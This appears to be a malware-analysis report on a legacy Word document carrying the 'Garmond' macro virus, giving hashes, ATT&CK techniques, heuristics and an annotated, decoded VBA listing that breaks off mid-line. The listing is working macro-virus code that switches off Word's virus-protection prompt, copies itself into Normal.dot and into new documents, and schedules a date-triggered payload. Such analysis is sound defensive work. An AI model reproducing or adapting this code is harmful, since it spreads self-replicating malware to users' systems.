Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aabd8a78a3d8f7af…

MALICIOUS

Office (OLE)

40.0 KB Created: 1997-01-30 14:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: df7594066866dbe636a36656ed71271e SHA-1: c258f37137a2c646f6d72e1c4f243409b502d84e SHA-256: aabd8a78a3d8f7afa593c9a11d1a4d25e7503beb297e4d46fe9e901d7721a099
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to initialize stealth functions and conditionally execute further actions based on the date, suggesting a downloader or backdoor functionality. The presence of legacy WordBasic markers and the AutoOpen macro points towards an older, but still potentially dangerous, macro-based attack.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29088 bytes
SHA-256: 8518244f6b29362b628e17584c46d97e6089494c98bd2f2ef674b63ea2c6babe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: header of the document's own "ThisDocument" module as carved
' by olevba. No procedures belonging to this module appear in the preview;
' the macro body lives in the separate "Garmond" module below.

Attribute VB_Name = "Garmond"
' Long live John Garmond
' Created by NAENBGOURSG
' Greece, x-mas 1998
' Analyst note: "Garmond" is the module the AutoOpen/AutoNew routines copy
' between the active document and Normal.dot. The module name itself is the
' infection marker that AlreadyInitialized() looks for.

Option Explicit

' 12-element string array (indices 0-11 under the default Option Base 0).
' Communicate() types strTexts(intIndex) into the document one character at
' a time; SetStrings (not in the preview) presumably fills it - confirm.
Public strTexts(11) As String

' Returns True when a VBA component named "Garmond" already exists in the
' active document's VBProject, False otherwise. AutoOpen() uses it to decide
' whether the module still has to be imported into the current document.
' NOTE(review): enumerating VBProject.VBComponents needs programmatic access
' to the VBA project object model, which later Office versions block by
' default ("Trust access to the VBA project object model" off); whether that
' neuters this sample on a given build should be confirmed, not assumed.
Function AlreadyInitialized()

    Dim varVbc As Variant
    
    ' Linear scan of the project's components; first name match wins.
    For Each varVbc In ActiveDocument.VBProject.VBComponents
        If varVbc.Name = "Garmond" Then
            AlreadyInitialized = True
            Exit Function
        End If
    Next varVbc

    AlreadyInitialized = False

End Function

' Word auto-macro: Word runs AutoNew automatically whenever a new document is
' created from the template that carries it (here: Normal.dot once infected).
' Same state-file logic as AutoOpen() below, but without the OrganizerCopy
' into Normal.dot and with a different trigger date.
Sub AutoNew()

    Dim blCommunicated As Integer
    Dim strInfDate As String
        
    ' Every runtime error is swallowed, so the whole routine fails silently.
    On Error Resume Next
    
    ' Switches off Word's macro-virus protection prompt (Word 97-era option).
    ' Detection point: a macro touching Options.VirusProtection.
    Options.VirusProtection = False
    
    ' State file on the host: line 1 = "already communicated" flag,
    ' line 2 = timestamp of first execution. Its presence is a host artifact.
    Open "c:\grmd.cfg" For Input As #1
        
    ' Err 53 = "File not found": first run on this host. Create the state
    ' file, record the time, and do nothing else in this session.
    If Err = 53 Then
        Open "c:\grmd.cfg" For Output As #1
        Print #1, 0
        Print #1, Now
        Close
        Exit Sub
    Else
        Input #1, blCommunicated
        Input #1, strInfDate
        Close
    End If
   
    ' Once the flag is non-zero the macro removes its own project item from
    ' normal.dot and stops. Nothing in the preview sets the flag to non-zero;
    ' presumably the truncated tail of Communicate() does - confirm.
    If blCommunicated Then
        Application.OrganizerDelete Source:="normal.dot", _
        Name:="Garmond", Object:=wdOrganizerObjectProjectItems
        Exit Sub
    End If
    
    ' Propagation: export the module from the Normal template to a temp file,
    ' import it into the active document, then delete the temp file.
    ' The temp name (~wrl2561.tmp under NormalTemplate.Path) is a transient
    ' file-system artifact; note the forward slash in the path.
    NormalTemplate.VBProject.VBComponents("Garmond").Export _
        NormalTemplate.Path & "/~wrl2561.tmp"
    ActiveDocument.VBProject.VBComponents.Import _
        NormalTemplate.Path & "/~wrl2561.tmp"
    Kill NormalTemplate.Path & "/~wrl2561.tmp"
   
    ' Seeds Rnd for the delays used in Communicate(). InitStealth is not in
    ' the preview, so its behaviour cannot be confirmed from this listing.
    Randomize
    InitStealth
    
    ' Payload trigger: 27 September only. SetStrings (not shown) presumably
    ' populates strTexts, then Communicate() is scheduled through OnTime.
    ' 0.6 is a fractional-day time value (14:24); how Word resolves a
    ' date-less value here is not confirmed.
    If Month(Now) = 9 And Day(Now) = 27 Then
        SetStrings
        Application.OnTime 0.6, "Communicate"
    End If

End Sub

' Word auto-macro: Word runs AutoOpen automatically when the document opens.
' This is the infection entry point: it copies the "Garmond" module into the
' global template Normal.dot, after which AutoNew()/AutoOpen() fire for
' documents that have nothing to do with the original attachment.
Sub AutoOpen()

    Dim blCommunicated As Integer
    Dim strInfDate As String
        
    ' Every runtime error is swallowed, so the whole routine fails silently.
    On Error Resume Next
    
    ' Switches off Word's macro-virus protection prompt (Word 97-era option).
    Options.VirusProtection = False
    
    ' Global-template infection: copy this document's "Garmond" project item
    ' into Normal.dot. Unexpected modification of Normal.dot is the primary
    ' host-based detection point for this family of macro virus.
    Application.OrganizerCopy _
        Source:=Application.ActiveDocument.FullName, _
        Destination:="Normal.dot", Name:="Garmond", Object:= _
        wdOrganizerObjectProjectItems
    
    ' State file on the host: line 1 = "already communicated" flag,
    ' line 2 = timestamp of first execution.
    Open "c:\grmd.cfg" For Input As #1
    
    ' Err 53 = "File not found": first run on this host. Create the state
    ' file, record the time, and do nothing else in this session - so the
    ' payload never runs in the same session as the initial infection.
    If Err = 53 Then
        Open "c:\grmd.cfg" For Output As #1
        Print #1, 0
        Print #1, Now
        Close
        Exit Sub
    Else
        Input #1, blCommunicated
        Input #1, strInfDate
        Close
    End If
    
    ' Once the flag is non-zero the macro removes its own project item from
    ' normal.dot and stops. Nothing in the preview sets the flag to non-zero;
    ' presumably the truncated tail of Communicate() does - confirm.
    If blCommunicated Then
        Application.OrganizerDelete Source:="normal.dot", _
        Name:="Garmond", Object:=wdOrganizerObjectProjectItems
        Exit Sub
    End If
    
    ' Seeds Rnd for the delays used in Communicate(). InitStealth is not in
    ' the preview, so its behaviour cannot be confirmed from this listing.
    Randomize
    InitStealth
    
    ' Re-import the module from Normal.dot only when this document does not
    ' already carry a "Garmond" component (see AlreadyInitialized()).
    ' Same export/import/Kill sequence and ~wrl2561.tmp artifact as AutoNew().
    If Not AlreadyInitialized Then
        NormalTemplate.VBProject.VBComponents("Garmond").Export _
            NormalTemplate.Path & "/~wrl2561.tmp"
        ActiveDocument.VBProject.VBComponents.Import _
            NormalTemplate.Path & "/~wrl2561.tmp"
        Kill NormalTemplate.Path & "/~wrl2561.tmp"
    End If
    
    ' Payload trigger: the 28th of any month divisible by 3 (March, June,
    ' September, December). SetStrings (not shown) presumably populates
    ' strTexts, then Communicate() is scheduled through OnTime. 0.6 is a
    ' fractional-day time value (14:24); how Word resolves a date-less value
    ' here is not confirmed.
    If Month(Now) Mod 3 = 0 And Day(Now) = 28 Then
        SetStrings
        Application.OnTime 0.6, "Communicate"
    End If

End Sub

Sub Communicate()
Attribute Communicate.VB_Description = "Makro aufgezeichnet am 14.09.99 von Bernd Liebermann"
Attribute Communicate.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Makro1"

On Error Resume Next

Static intIndex As Integer
Dim intDelay As Long, i As Long, j As Long, tmp As Double

For i = 1 To Len(strTexts(intIndex))
    Selection.TypeText Mid(strTexts(intIndex), i, 1)
    intDelay = Int(25000 * Rnd)
    j = 0
    Do
        j = j + 1
        tmp = 2 ^ 0.5
    Loop Until j = intDelay
Next i

intIndex = intIndex + 1
Select Case intIndex
Case 1
    Application.OnTime Now + TimeValue("00:00:04"), "Communicate"
Case 2
    Application.OnTime Now + TimeValue("00:00:08"), "Communicate"
Case 3
    Application.OnTime Now + TimeValue("00:00:09"), "Communicate"
Case 4
    Application.OnTime Now + TimeValue("00:00:07"), "Communicate"
Case 5
    Application.OnTime 
... (truncated)